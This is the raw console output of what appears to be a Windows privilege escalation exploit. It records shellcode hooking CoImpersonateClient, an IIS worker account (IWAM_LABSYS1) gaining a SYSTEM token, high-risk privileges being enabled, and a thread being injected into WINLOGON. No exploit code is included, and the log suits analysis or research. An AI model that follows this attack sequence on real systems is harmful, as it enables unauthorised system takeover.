DLL_PROCESS_ATTACH (0x10000000, 1, 00000000) Reading shellcode from 0x1000101e Shellcode is 354 bytes long Hooking CoImpersonateClient (0x77a9bb64) with shellcode at 0xb2368 DLL_THREAD_ATTACH (0x10000000, 2, 00000000) DLL_PROCESS_DETACH (0x10000000, 0, 00000000) DLL_PROCESS_ATTACH (0x10000000, 1, 00000000) CoImpersonateClient has already been hooked In HookedCoImpersonateClient Before: running as IWAM_LABSYS1 PRIMARY PROCESS BEFORE ATTACK This is a unrestricted token Token type: primary Token ID: 0x6a95ec Authentication ID: 0x696586 Token's owner: MCONOVUSI1\IWAM_LABSYS1 (user) Token's source: Advapi (0x696582) Token's user: MCONOVUSI1\IWAM_LABSYS1 (user) Token's primary group: MCONOVUSI1\None (group) Default DACL (64 bytes): ACE count: 2 ACE 0: Applies to: MCONOVUSI1\IWAM_LABSYS1 (unknown) ACE inherited by: not inheritable Access permission mask = 0x10000000 Access mode: grant access ACE 1: Applies to: NT AUTHORITY\SYSTEM (unknown) ACE inherited by: not inheritable Access permission mask = 0x10000000 Access mode: grant access Token's privileges (3 total): SeIncreaseQuotaPrivilege (0x5) = disabled SeChangeNotifyPrivilege (0x17) = [enabled by default] SeUndockPrivilege (0x19) = disabled After executing CoImpersonateClient After: running as SYSTEM PRIMARY PROCESS AFTER ATTACK This is a unrestricted token Token type: primary Token ID: 0x6a95ec Authentication ID: 0x696586 Token's owner: MCONOVUSI1\IWAM_LABSYS1 (user) Token's source: Advapi (0x696582) Token's user: MCONOVUSI1\IWAM_LABSYS1 (user) Token's primary group: MCONOVUSI1\None (group) Default DACL (64 bytes): ACE count: 2 ACE 0: Applies to: MCONOVUSI1\IWAM_LABSYS1 (unknown) ACE inherited by: not inheritable Access permission mask = 0x10000000 Access mode: grant access ACE 1: Applies to: NT AUTHORITY\SYSTEM (unknown) ACE inherited by: not inheritable Access permission mask = 0x10000000 Access mode: grant access Token's privileges (3 total): SeIncreaseQuotaPrivilege (0x5) = disabled SeChangeNotifyPrivilege (0x17) = [enabled by default] SeUndockPrivilege (0x19) = disabled Enabling SeAssignPrimaryTokenPrivilege (if present) Enabling SeIncreaseQuotaPrivilege (if present) Enabling SeCreateTokenPrivilege (if present) Enabling SeDebugPrivilege (if present) Enabling SeMachineAccountPrivilege (if present) Enabling SeSecurityPrivilege (if present) Enabling SeTakeOwnershipPrivilege (if present) Enabling SeTcbPrivilege (if present) IMPERSONATION THREAD TOKEN BEFORE ADJUSTING PRIVILEGES This is a unrestricted token Token type: impersonation Impersonation level: impersonation Token ID: 0x6d3a99 Authentication ID: 0x3e7 Token's owner: BUILTIN\Administrators (alias) Token's source: *SYSTEM* (0x0) Token's user: NT AUTHORITY\SYSTEM (user) Token's primary group: NT AUTHORITY\SYSTEM (user) Default DACL (68 bytes): ACE count: 2 ACE 0: Applies to: NT AUTHORITY\SYSTEM (unknown) ACE inherited by: not inheritable Access permission mask = 0x10000000 Access mode: grant access ACE 1: Applies to: BUILTIN\Administrators (unknown) ACE inherited by: not inheritable Access permission mask = 0xa0020000 Access mode: grant access Token's privileges (14 total): SeTcbPrivilege (0x7) = [enabled by default] SeUndockPrivilege (0x19) = [enabled] SeTakeOwnershipPrivilege (0x9) = [enabled] SeCreatePagefilePrivilege (0xf) = [enabled by default] SeLockMemoryPrivilege (0x4) = [enabled by default] SeSystemtimePrivilege (0xc) = [enabled] SeProfileSingleProcessPrivilege (0xd) = [enabled by default] SeIncreaseBasePriorityPrivilege (0xe) = [enabled by default] SeCreatePermanentPrivilege (0x10) = [enabled by default] SeDebugPrivilege (0x14) = [enabled by default] SeAuditPrivilege (0x15) = [enabled by default] SeSecurityPrivilege (0x8) = [enabled] SeLoadDriverPrivilege (0xa) = [enabled] SeChangeNotifyPrivilege (0x17) = [enabled by default] IMPERSONATION THREAD TOKEN AFTER ADJUSTING PRIVILEGES This is a unrestricted token Token type: impersonation Impersonation level: impersonation Token ID: 0x6d3a99 Authentication ID: 0x3e7 Token's owner: BUILTIN\Administrators (alias) Token's source: *SYSTEM* (0x0) Token's user: NT AUTHORITY\SYSTEM (user) Token's primary group: NT AUTHORITY\SYSTEM (user) Default DACL (68 bytes): ACE count: 2 ACE 0: Applies to: NT AUTHORITY\SYSTEM (unknown) ACE inherited by: not inheritable Access permission mask = 0x10000000 Access mode: grant access ACE 1: Applies to: BUILTIN\Administrators (unknown) ACE inherited by: not inheritable Access permission mask = 0xa0020000 Access mode: grant access Token's privileges (14 total): SeTcbPrivilege (0x7) = [enabled by default] SeUndockPrivilege (0x19) = [enabled] SeTakeOwnershipPrivilege (0x9) = [enabled] SeCreatePagefilePrivilege (0xf) = [enabled by default] SeLockMemoryPrivilege (0x4) = [enabled by default] SeSystemtimePrivilege (0xc) = [enabled] SeProfileSingleProcessPrivilege (0xd) = [enabled by default] SeIncreaseBasePriorityPrivilege (0xe) = [enabled by default] SeCreatePermanentPrivilege (0x10) = [enabled by default] SeDebugPrivilege (0x14) = [enabled by default] SeAuditPrivilege (0x15) = [enabled by default] SeSecurityPrivilege (0x8) = [enabled] SeLoadDriverPrivilege (0xa) = [enabled] SeChangeNotifyPrivilege (0x17) = [enabled by default] PRIMARY THREAD TOKEN AFTER ATTACK This is a unrestricted token Token type: primary Token ID: 0x6d3c81 Authentication ID: 0x3e7 Token's owner: BUILTIN\Administrators (alias) Token's source: *SYSTEM* (0x0) Token's user: NT AUTHORITY\SYSTEM (user) Token's primary group: NT AUTHORITY\SYSTEM (user) Default DACL (68 bytes): ACE count: 2 ACE 0: Applies to: NT AUTHORITY\SYSTEM (unknown) ACE inherited by: not inheritable Access permission mask = 0x10000000 Access mode: grant access ACE 1: Applies to: BUILTIN\Administrators (unknown) ACE inherited by: not inheritable Access permission mask = 0xa0020000 Access mode: grant access Token's privileges (14 total): SeTcbPrivilege (0x7) = [enabled by default] SeUndockPrivilege (0x19) = [enabled] SeTakeOwnershipPrivilege (0x9) = [enabled] SeCreatePagefilePrivilege (0xf) = [enabled by default] SeLockMemoryPrivilege (0x4) = [enabled by default] SeSystemtimePrivilege (0xc) = [enabled] SeProfileSingleProcessPrivilege (0xd) = [enabled by default] SeIncreaseBasePriorityPrivilege (0xe) = [enabled by default] SeCreatePermanentPrivilege (0x10) = [enabled by default] SeDebugPrivilege (0x14) = [enabled by default] SeAuditPrivilege (0x15) = [enabled by default] SeSecurityPrivilege (0x8) = [enabled] SeLoadDriverPrivilege (0xa) = [enabled] SeChangeNotifyPrivilege (0x17) = [enabled by default] PRIMARY PROCES TOKEN AFTER ADJUSTING PRIVILEGES This is a unrestricted token Token type: primary Token ID: 0x6a95ec Authentication ID: 0x696586 Token's owner: MCONOVUSI1\IWAM_LABSYS1 (user) Token's source: Advapi (0x696582) Token's user: MCONOVUSI1\IWAM_LABSYS1 (user) Token's primary group: MCONOVUSI1\None (group) Default DACL (64 bytes): ACE count: 2 ACE 0: Applies to: MCONOVUSI1\IWAM_LABSYS1 (unknown) ACE inherited by: not inheritable Access permission mask = 0x10000000 Access mode: grant access ACE 1: Applies to: NT AUTHORITY\SYSTEM (unknown) ACE inherited by: not inheritable Access permission mask = 0x10000000 Access mode: grant access Token's privileges (3 total): SeIncreaseQuotaPrivilege (0x5) = [enabled] SeChangeNotifyPrivilege (0x17) = [enabled by default] SeUndockPrivilege (0x19) = disabled Injecting a thread into WINLOGON DLL_PROCESS_DETACH (0x10000000, 0, 00000001)